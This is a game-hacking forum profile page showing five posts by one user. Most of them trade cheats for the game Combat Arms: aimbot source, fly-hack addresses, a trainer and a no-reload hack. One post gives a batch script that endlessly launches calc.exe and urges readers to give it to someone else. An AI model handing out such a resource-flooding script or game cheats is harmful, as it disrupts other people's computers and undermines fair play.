Posts by Noonga
29 posts total, newest first.
CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!in Programming Tutorials - Try this:
@echo off
:loop
start calc.exe
echo PWNT!
goto loop
Well, actually, don't try it, just give it to someone else, lolAIMBOT!!!in Combat Arms Hacks & Cheats - Hey, can you PM me the source? I can't PM, for some reason. Please? :3HOLY SHIT!!! THE FLY HACK ADDIES!!!!in Combat Arms Hacks & Cheats - What server and channel?HOLY SHIT!!! THE FLY HACK ADDIES!!!!in Combat Arms Hacks & Cheats - Ill come now. BTW, i can make a trainer if you give me the addies. I've made a Minesweeper Trainer if you need proof.[TUT] No reload hackin Combat Arms Hacks & Cheats - LOL... Learn to read, n00b. I said this is a no reload hack, not a infinite ammo hack. You still have ammo, its just that you dn't have to reload. You can fire the whole gun without reloading. And it does work, it worked
Showing the 5 most recent posts.